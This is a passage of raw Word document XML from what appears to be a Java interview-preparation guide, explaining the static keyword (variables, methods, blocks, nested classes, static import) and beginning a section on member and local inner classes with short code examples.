    </w:p>
    <w:p w14:paraId="5556105E" w14:textId="206400F5" w:rsidR="00946676" w:rsidRPr="00CE4B95" w:rsidRDefault="008C6F02">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="51" w:name="_Toc197867265"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the use of static keywords in java</w:t>
      </w:r>
      <w:r w:rsidR="00946676" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51"/>
    </w:p>
    <w:p w14:paraId="3E3A49BA" w14:textId="246ED37E" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="003E42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D5F86D3" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="003E427B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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B278DE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7C56E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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> count </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006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0</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Static variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181D957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1FA96C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4577D0EC"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Increment shared static variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2096CC25"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54227C2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A03019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06215D6"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System</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"Count: "</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>+</w:t>
      </w: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p>
    <w:p w14:paraId="7DECB437"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CCA9D62"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p>
    <w:p w14:paraId="0404BF1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523FDB8"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Tes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0C95B4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main</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[]</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> args</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C0828D"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4F5D0C13"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3FA51F3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Outputs: Count: 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CABC43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6C19E1EB" w14:textId="5795E445"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r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EAC76D" w14:textId="58233EA8" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="003E427B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54F162C2" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="003E427B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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variables are initialized when the class is loaded into memory and shared by all instances of the class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B66953A"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3977A95D"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belongs to the class rather than to any particular object of the class. It can be called using the class name and does not require an instance of the class to be created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA91FB7"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only directly access static variables and other static methods. They cannot access instance variables or instance methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79327B8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E517CDD"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30022C"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0088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> a</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7D054A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return</w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> a </w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w: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p>
    <w:p w14:paraId="5E4CA8D7"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3DF62AF4"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p>
    <w:p w14:paraId="27DAAD3B"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B347B11"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Tes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61EB5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void</w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> main</w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[]</w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> args</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28ED409"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result </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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</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6666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>5</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6666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>10</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Static method call</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6905F5"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0066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>result</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Outputs: 15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241653B0"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342226F" w14:textId="4BB6FE54"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r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E3E179" w14:textId="77777777" w:rsidR="00E004B0" w:rsidRDefault="00E004B0" w:rsidP="003E427B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0503CA38" w14:textId="4647ADD0"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Static Blocks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D718967"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for static initialization of a class. It is executed only once when the class is loaded into memory (before any constructor or method is called).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B12411"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used for initialization tasks like setting up static variables or performing one-time setup actions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C1462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43C72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InitializationExample</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DF4B6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00D5FC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block executed"</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1F189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0007DBB"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE42C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59E35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Main method executed"</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317A68E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1A34473" w14:textId="06D4B2CF"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43638A3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CBAB26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executed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015A0EE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 method executed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F986D5" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="003E427B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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blocks are executed in the order they appear in the class, and only once per class load.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB682F4"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Static Classes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCAAD79" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="003E427B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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A2280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89BC8C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int</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> staticVar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6666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B71C44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4683665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Nested</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9F9877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4CFEAF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variable from outer class: "</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> staticVar</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277567F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E2304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061B703"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p>
    <w:p w14:paraId="3FB6A5D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5D04E1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F5E16E1"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77A06E2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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> nested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0088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>new</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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60AEEC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nested</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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Outputs: Static variable from outer class: 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A510D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EE100C0" w14:textId="2A3EA796"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10081BD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221FDEF8" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="003E427B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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you can use static import to access static members (variables and methods) of a class directly without qualifying them with the class name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB992D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630047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import</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java</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lang</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Math</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2903D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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F85B73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7D347F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F7DDB4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0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sqrt</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>25</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Instead of Math.sqrt(25), just sqrt(25)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A51096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AC2E487" w14:textId="21354AE5"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A82D20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7BF4AF3"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Static members are shared by all instances of the class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AB3D45"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members are allocated memory once when the class is loaded, and they are not duplicated for each instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345A569C"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mbers</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Static members can be accessed directly using the class name, without creating an instance of the class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B970A6"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2338D7"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when a variable or method should be shared across all instances of the class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B487435"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 static for utility methods (like Math.sqrt(), Collections.sort()).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059F08DF"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to define constants (e.g., public static final double PI = 3.14159;).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412410E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using static, you reduce memory consumption (as the same member is shared across all instances) and allow methods and variables to be accessed without creating an object of the class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42CE0103" w14:textId="2E00AF8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79" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D14A760" w14:textId="33BE1C79" w:rsidR="00946676" w:rsidRPr="00CE4B95" w:rsidRDefault="00330FC2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="52" w:name="_Toc197867266"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is inner class? Have you used inner class in your project</w:t>
      </w:r>
      <w:r w:rsidR="00946676" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="52"/>
    </w:p>
    <w:p w14:paraId="0C0C9CC1" w14:textId="6AB9B235" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="0013258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an Inner Class?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE6454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veral types of inner classes in Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6402A29D"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A class defined within another class at the member level.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54255C84"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A class defined within a method or a block.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385B1AFB"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A class without a name, often used to instantiate classes that implement interfaces or extend other classes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A26DFA9"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A class defined within another class but with the static modifier, meaning it does not need an instance of the outer class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605F0D04"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ner Class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39833C4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different types of inner classes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAB4F5E"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ber Inner Class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1910CD7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xml:space="preserve"> is a regular inner class that is declared at the member level inside an outer class. It can access all members (including private members) of the outer class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CE3A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3AC98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outer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Outer Class Variable"</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F66D2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1696922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97194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5670E0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outer class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outerVariable</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D924F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1059D9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F7B9C5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429CAC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create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5573A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Inner class can be created inside an outer method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5342F0C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inn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A1C397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D674E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p>
    <w:p w14:paraId="394EE15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22774E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EBCF23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A55DE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1010680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createInnerClass</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6073606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3039A4" w14:textId="6D6BA5C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6807286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al Inner Class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A70CC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xml:space="preserve"> is defined within a method or a constructor. It has access to local variables and parameters within that method or constructor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC9126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ED4B32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0E95A4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339F6D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how</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1C073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Inside Local Inner Class"</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F21685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FACC4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0B5A1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388CF6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local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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CE29D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localInner</w:t>
      </w:r>
